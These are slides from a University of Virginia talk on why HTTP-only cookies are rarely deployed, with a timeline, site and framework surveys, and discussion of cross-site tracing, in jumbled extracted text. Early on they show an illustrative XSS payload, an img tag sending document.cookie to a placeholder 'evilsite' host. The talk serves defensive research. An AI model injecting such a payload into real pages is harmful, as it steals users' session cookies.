Why aren’t HTTP-only cookies
more widely deployed?
Department of Computer Science
University of Virginia
Yuchen Zhou
David Evans
HTTP-only Cookies
Cookie:
Name = value;
Domain = value;
Expiration time = value;
Path = value;
Secure
Secure;
Httponly
HTTP-only field prevents cookies
from being read via
document.cookie.
Modify DOM
User credentials
Disclose user’s
confidential
Send back
Install trojan
Inject
<img src = http://evilsite/stealyourcookie.cgi?value=document.cookie>
HTTP-only Deployment Timeline
Client/Other
Events
Firefox extension supports HTTP-only
IE6 introduces HTTP-only
Server-side
Events
2002
2003
2004
Lots of major
major sites
sites
still don’t
don’t use
use
HTTP-only cookie
cookie
w3.org specifies that browsers should
disallow TRACE XMLHTTPRequests
US-CERT vulnerability note on XST
attacks
TRACE method disabled by all major browsers Apache.org
Apache.org
compromised by
compromised
by cookie
cookie
stealing XSS
stealing
XSS attacks
attacks
Firefox 2.0.0.5 supports HTTP-only.
IETF standard draft
includes HTTP-only
IE8 fixes XMLHTTPResponse exploit
2005
2006
Django developers consider supporting HTTP-only,
but compatibility concerns held them back.
2007
2008
2009
Python supports HTTP-only.
Django unofficial patch available.
2010
Still no official Django
support for HTTP-only
Ruby on Rails supports HTTP-only
TRACE method is still on by default on
Apache servers and major websites [10]
Ruby on Rails sets HTTP-only on by default
Methodology
• 50 sites collected from Alexa.com world top 100 popular sites.
Httponly?
• Manually registered accounts and collected post-login cookie
properties of all sites.
Survey Results
After
Use HTTP-only
login, 13
authentication
cookies, 24
Before login, 11
No HTTP-only
No HTTP-only
authentication
authentication
cookies, 26
cookies, 26
Kapil Singh et al (2010 Oakland) also gave similar
results on the deployment of HTTP-only cookies:
HTTP-only: 30/100 16.2% on 100,000
Survey Results on Web Frameworks
Frameworks
Version
Date
HTTP-only
Support
HTTP-only
Default
1.1.1
July 2009
No
Authkit 0.4.4
July 2009
No
Repoze.who 1.0.10
2009
No
2.3.2
Mar 2009
Yes
Yes
2.2.2
Nov 2008
Yes
No
2.1.2
Oct 2008
No
4.0
Feb 2010
Yes
Yes
1.4
Feb 2010
Yes
No
3.0
Feb 2010
No
No
Why Aren’t HTTP-only Cookies
More Widely Deployed?
Page Functionality
Does DOM need to read cookies?
– Only 1 site out of 50 showed a minor malfunction
on their web IM gadget. (renren.com)
Can We Circumvent HTTP-only?
var cookie
Send back
Inject
Can We Circumvent HTTP-only?
• Cross-site tracing
30
25
20
15
10
5
0
2
22
• AJAX based attack
6
20
Enable
Trace
Disable
Trace
30
25
20
15
10
5
0
0
5
24
21
Insecure
Secure
Protection Effectiveness
CSRF
Hard drive
Software Stack Compatibility
“Hmm, we probably can't use a patch that
requires a patched python. Any different
solution?”
• Python doesn’t support HTTP-only until 2.6
• Django is based on python, so the deployment
progress is stalled.
Standards Compliance
“Also, could you point me to where the RFC
is talking about 'httponly'? I couldn't find it
at all.”
• Cookie specification has never been updated
since HTTP-only was introduced.
• Without the specs, the developers are hesitating
to make the change.
Difficulty in Deploying in Both Ends
Client/Other
Events
Firefox extension supports HTTP-only
IE6 introduces HTTP-only
Server-side
Events
2002
2003
2004
Lots of major sites
still don’t use
HTTP-only cookie
w3.org specifies that browsers should
disallow TRACE XMLHTTPRequests
US-CERT vulnerability note on XST
attacks
TRACE method disabled by all major browsers Apache.org
compromised by cookie
stealing XSS attacks
Firefox 2.0.0.5 supports HTTP-only.
IETF standard draft
includes HTTP-only
IE8 fixes XMLHTTPResponse exploit
2005
2006
Django developers consider supporting HTTP-only,
but compatibility concerns held them back.
2007
2008
2009
Python supports HTTP-only.
Django unofficial patch available.
2010
Still no official Django
support for HTTP-only
Ruby on Rails supports HTTP-only
TRACE method is still on by default on
Apache servers and major websites [10]
Ruby on Rails sets HTTP-only on by default
Difficulty in Deploying in Both Ends
• Add HTTP-only field to cookies
• Disable Trace and implement
Set-cookie securely
• Interpret HTTP-only field correctly
• Implement HTTP-only defense correctly
• Similar deployment issues:
– Set-cookie2 header in RFC2965
– Updating TCP protocol
Lessons Learned
① Maintain backward compatibility
Httponly
Httponly = true
② Be aggressive on client side.
③ Opt-in? Opt-out!
Backup Slides
Survey Results
• Kapil Singh et al (2010 Oakland) also proved
similar results on the deployment of HTTPonly cookies:
Survey Results on More Sites
Page Functionality
Google analytics?